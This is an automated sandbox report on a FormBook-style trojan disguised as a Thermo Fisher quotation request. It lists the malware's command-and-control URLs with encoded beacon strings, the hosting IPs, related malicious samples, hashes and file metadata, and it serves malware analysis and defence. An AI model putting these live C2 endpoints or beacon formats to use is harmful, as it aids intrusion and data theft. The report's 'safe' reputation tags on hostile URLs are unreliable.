                                          http://www.izmirescortg.xyz/lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tals.xyz/k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.brightvision.website/gn26/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.madhf.tech/0mwe/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.yunlekeji.top/t322/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdYuxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000035A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/chrome_newtabmobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icomobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5amobsync.exe, 00000005.00000002.3904399243.0000000004EA6000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003416000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.ecosia.org/newtab/mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.brightvision.websiteuxnRAYhIPZRPiA.exe, 00000006.00000002.3905763155.0000000005333000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ac.ecosia.org/autocomplete?q=mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbBmobsync.exe, 00000005.00000002.3904399243.0000000005812000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003D82000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.thinkphp.cnmobsync.exe, 00000005.00000002.3904399243.000000000535C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000038CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.canadavinreport.site/g3h7/?sVC8z=dyqWmobsync.exe, 00000005.00000002.3906187965.0000000007290000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.00000000051CA000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.000000000373A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            45.141.156.114
                                                            logidant.xyzGermany
                                                            30860YURTEH-ASUAtrue
                                                            106.15.109.33
                                                            www.yunlekeji.topChina
                                                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                            13.248.169.48
                                                            www.tals.xyzUnited States
                                                            16509AMAZON-02UStrue
                                                            104.21.40.167
                                                            www.zkdamdjj.shopUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            203.161.42.73
                                                            www.brightvision.websiteMalaysia
                                                            45899VNPT-AS-VNVNPTCorpVNfalse
                                                            103.224.182.242
                                                            www.madhf.techAustralia
                                                            133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                            185.27.134.206
                                                            www.canadavinreport.siteUnited Kingdom
                                                            34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                            104.21.36.62
                                                            www.izmirescortg.xyzUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            134.0.14.158
                                                            aballanet.catSpain
                                                            197712CDMONsistemescdmoncomEStrue
                                                            202.79.161.151
                                                            r0lqcud7.nbnnn.xyzSingapore
                                                            64050BCPL-SGBGPNETGlobalASNSGfalse
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1559710
                                                            Start date and time:2024-11-20 21:07:27 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 43s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Run name:Run with higher sleep bypass
                                                            Number of analysed new started processes analysed:7
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:Thermo Fisher Scientific - Ajnlatkrs.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@11/10
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 91%
                                                            • Number of executed functions: 51
                                                            • Number of non-executed functions: 298
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            No simulations
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            45.141.156.114CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                            • www.logidant.xyz/ctvu/
                                                            13.248.169.48DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                            • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                            • www.remedies.pro/hrap/
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.optimismbank.xyz/lnyv/
                                                            New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                            • www.avalanchefi.xyz/ctta/
                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                            • www.egldfi.xyz/3e55/
                                                            Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.tals.xyz/010v/
                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                            • www.wajf.net/dkz5/
                                                            rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                            • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                            dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                            • www.extrem.tech/ikn1/
                                                            Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                            • www.sonoscan.org/ew98/
                                                            104.21.40.167NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                            • www.zkdamdjj.shop/wut3/?D6l0F8S=a71d2iXWZwmjtFjuom9eWzv+mdeRMHZm6+v2+EUi1ZskJvHTTp5lIOph9rFSFtMOhpM1XQ/67KJlS/ITLExlGTOPMODybYiKiBVMYz6WSb2v98cStA==&xBhHN=XxBH2Fkx1FgP
                                                            203.161.42.73need quotations.exeGet hashmaliciousFormBookBrowse
                                                            • www.trendave.xyz/nhcb/
                                                            PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                                                            • www.nexio.life/xsla/
                                                            MV ALIADO-S-REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                            • www.nexio.life/xsla/
                                                            doc330391202408011.exeGet hashmaliciousFormBookBrowse
                                                            • www.vynix.xyz/bgqc/
                                                            yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                            • www.wyrlo.live/d98v/?EN-hu=LYDXGQwVCoMuYrXSW7MgSssXW4nPW6/lB4t/975EIYDnNxIunPhAyQV+sFLwFKE3iI1OoyaerizxnpL4k+hV3wpy9h6iImSBX/Gothd1bsBJyDzWSA==&zx=TzUh
                                                            MV ALIADO - S-REQ-19-00064 List items.exeGet hashmaliciousFormBookBrowse
                                                            • www.nexio.life/xsla/
                                                            AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                            • www.slyra.xyz/05no/
                                                            MV ALIADO - S-REQ-19-00064.7Z.exeGet hashmaliciousFormBookBrowse
                                                            • www.nexio.life/xsla/
                                                            176654 Grade B2FA, BRF-MBO2 & CX2OB.exeGet hashmaliciousFormBookBrowse
                                                            • www.nexio.life/xsla/
                                                            DN.exeGet hashmaliciousFormBookBrowse
                                                            • www.slyra.xyz/05no/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.zkdamdjj.shopNEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                            • 104.21.40.167
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • 188.114.97.3
                                                            www.madhf.techSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                            • 103.224.182.242
                                                            r0lqcud7.nbnnn.xyzRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                            • 27.124.4.246
                                                            New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                            • 23.225.159.42
                                                            www.tals.xyzQuotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdarm4.elfGet hashmaliciousMiraiBrowse
                                                            • 121.40.31.154
                                                            Lee.6B4k4ja1.exe.part.exeGet hashmaliciousCobaltStrikeBrowse
                                                            • 101.133.156.69
                                                            Label_00750700.doc.jsGet hashmaliciousUnknownBrowse
                                                            • 101.200.53.150
                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 8.177.239.137
                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 120.77.2.43
                                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 120.25.240.221
                                                            arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 106.14.155.225
                                                            owari.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 8.135.254.111
                                                            owari.x86.elfGet hashmaliciousUnknownBrowse
                                                            • 8.159.102.60
                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                            • 8.191.184.118
                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                            • 172.64.41.3
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 104.21.66.38
                                                            https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                            • 104.17.25.14
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.206.172
                                                            PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                            • 172.67.187.200
                                                            LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                            • 172.67.187.200
                                                            YyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                            • 104.21.93.38
                                                            zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                            • 172.67.204.56
                                                            YyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                            • 104.21.93.38
                                                            zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                            • 172.67.204.56
                                                            AMAZON-02USfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                            • 108.139.47.108
                                                            Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                            • 13.227.8.87
                                                            Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                            • 3.128.89.23
                                                            https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                            • 54.250.95.82
                                                            https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                            • 3.108.189.24
                                                            m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 18.153.209.52
                                                            http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=SepGet hashmaliciousUnknownBrowse
                                                            • 13.227.8.87
                                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                                            • 108.150.67.198
                                                            i486.elfGet hashmaliciousMiraiBrowse
                                                            • 13.225.74.211
                                                            mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 108.136.213.161
                                                            VNPT-AS-VNVNPTCorpVNppc.elfGet hashmaliciousMiraiBrowse
                                                            • 14.245.235.111
                                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                                            • 123.25.106.125
                                                            i486.elfGet hashmaliciousMiraiBrowse
                                                            • 113.175.131.151
                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.228
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • 202.92.5.23
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.46.205
                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.42.73
                                                            exe009.exeGet hashmaliciousEmotetBrowse
                                                            • 113.161.148.81
                                                            5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.46.205
                                                            MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.49.193
                                                            YURTEH-ASUACV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                            • 45.141.156.114
                                                            support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            • 31.42.187.210
                                                            support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            • 31.42.187.210
                                                            SI HE Voy - TC Relet 11.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 152.89.61.240
                                                            MV ALEXOS_VESSEL'S DESC.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 152.89.61.240
                                                            https://r2.ddlnk.net/c/AQj0-RUQuwkYipioASC0cRmrHeGLBOb7t9m7_CWaa81LkCY1aSe2ilmnvwK5PXzQGet hashmaliciousUnknownBrowse
                                                            • 152.89.61.240
                                                            https://campaign-statistics.com/link_click/OOIhh4OKHe_NcHPG/8cb76dcdebff138ed04c1331049114e6Get hashmaliciousUnknownBrowse
                                                            • 152.89.61.240
                                                            https://campaign-statistics.com/link_click/ODQJBme7yo_NcFtX/22e0ea1236db29f11ee5970fcc1e783cGet hashmaliciousUnknownBrowse
                                                            • 152.89.61.240
                                                            https://discountdays.ru/Get hashmaliciousUnknownBrowse
                                                            • 31.42.186.237
                                                            rC-P-0000054697.exeGet hashmaliciousFormBookBrowse
                                                            • 152.89.61.240
                                                            No context
                                                            No context
                                                            Process:C:\Windows\SysWOW64\mobsync.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):287232
                                                            Entropy (8bit):7.996070165551948
                                                            Encrypted:true
                                                            SSDEEP:6144:n7el2uClot4eDP1LS1IyJICdZTrPTdtJ6zhtlvTpp16+51Aja2:n7EClohD12WyCCDTXdtozhtJTv16+Ijx
                                                            MD5:6312BE8E131D2B7342EBDD0C1E4FE151
                                                            SHA1:2607A0C691260292B0A5DE028E22B183F22A2617
                                                            SHA-256:CD3E6B088EBB686FCFFA7025668EBE9C550A5FA2F1AAC8A669D571496CDA792F
                                                            SHA-512:C50CB856E077EC3FDB0ED5BC58132AEE9519D07587B1E4971DB57583F217D19C1B1255E91E0BF5C02399D2E3C8C35922F9F3667D6D31B07CFF5A937E2994ADC3
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:{..4Y2F8IEIN..TJ.SQ4M7A5u6YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK.OX4T-.6M.@.j.U..r.\$DaEGY>:.&.,9Z4]2./ i<>%t#,s.{..,ZQSwEBA.OX4Z2F84D@.v+3..36.pW&./..u+Q.B...zX*.S..h*%..]._|UR.YHOK6OX4.wF8.DHN.c.*BSQ4M7A5.6[IDJ=OXd^2F8MEINKK.^BSQ$M7AU16YH.K6_X4Z0F8KEINKKTJDSQ4M7A55V]HOI6OX4Z2D8..IN[KTZBSQ4]7A%56YHOK&OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINe?126SQ49yE55&YHO.2OX$Z2F8MEINKKTJBSq4MWA556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8ME
                                                            Process:C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):287232
                                                            Entropy (8bit):7.996070165551948
                                                            Encrypted:true
                                                            SSDEEP:6144:n7el2uClot4eDP1LS1IyJICdZTrPTdtJ6zhtlvTpp16+51Aja2:n7EClohD12WyCCDTXdtozhtJTv16+Ijx
                                                            MD5:6312BE8E131D2B7342EBDD0C1E4FE151
                                                            SHA1:2607A0C691260292B0A5DE028E22B183F22A2617
                                                            SHA-256:CD3E6B088EBB686FCFFA7025668EBE9C550A5FA2F1AAC8A669D571496CDA792F
                                                            SHA-512:C50CB856E077EC3FDB0ED5BC58132AEE9519D07587B1E4971DB57583F217D19C1B1255E91E0BF5C02399D2E3C8C35922F9F3667D6D31B07CFF5A937E2994ADC3
                                                            Malicious:false
                                                            Preview:{..4Y2F8IEIN..TJ.SQ4M7A5u6YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK.OX4T-.6M.@.j.U..r.\$DaEGY>:.&.,9Z4]2./ i<>%t#,s.{..,ZQSwEBA.OX4Z2F84D@.v+3..36.pW&./..u+Q.B...zX*.S..h*%..]._|UR.YHOK6OX4.wF8.DHN.c.*BSQ4M7A5.6[IDJ=OXd^2F8MEINKK.^BSQ$M7AU16YH.K6_X4Z0F8KEINKKTJDSQ4M7A55V]HOI6OX4Z2D8..IN[KTZBSQ4]7A%56YHOK&OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINe?126SQ49yE55&YHO.2OX$Z2F8MEINKKTJBSq4MWA556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8MEINKKTJBSQ4M7A556YHOK6OX4Z2F8ME
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.140293457148055
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            File size:1'208'320 bytes
                                                            MD5:dd888983c289f26094548b42ac5b6c85
                                                            SHA1:a1893cba8b45a0294340419f03e05140f0b62c3b
                                                            SHA256:3eace816daaec69a4652ce191c0369a0ce5aa933a38d68996e089e8949e46c3d
                                                            SHA512:e84aeb3aa9749b6a7d9cfd1f753c02fc87fdf8754c46e7295c1391e62273ce57c135a09519499b88d76655597b4d66c378a5086c10bcf413ba6ce69f66b8e42c
                                                            SSDEEP:24576:9tb20pkaCqT5TBWgNQ7aQBXc9A9HHYLnPh2VQ7hxtf6A:uVg5tQ7aQm9BjZvF5
                                                            TLSH:A945CF1373DE8361C7B25273BA25B701AEBF782506A5F86B2FD8093DF920121525E673
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                            Icon Hash:aaf3e3e3938382a0
                                                            Entrypoint:0x425f74
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x673DC1BE [Wed Nov 20 11:02:22 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                            Instruction
                                                            call 00007F3EBD106ACFh
                                                            jmp 00007F3EBD0F9AE4h
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007F3EBD0F9C6Ah
                                                            cmp edi, eax
                                                            jc 00007F3EBD0F9FCEh
                                                            bt dword ptr [004C0158h], 01h
                                                            jnc 00007F3EBD0F9C69h
                                                            rep movsb
                                                            jmp 00007F3EBD0F9F7Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007F3EBD0F9E34h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007F3EBD0F9C70h
                                                            bt dword ptr [004BA370h], 01h
                                                            jc 00007F3EBD0FA140h
                                                            bt dword ptr [004C0158h], 00000000h
                                                            jnc 00007F3EBD0F9E0Dh
                                                            test edi, 00000003h
                                                            jne 00007F3EBD0F9E1Eh
                                                            test esi, 00000003h
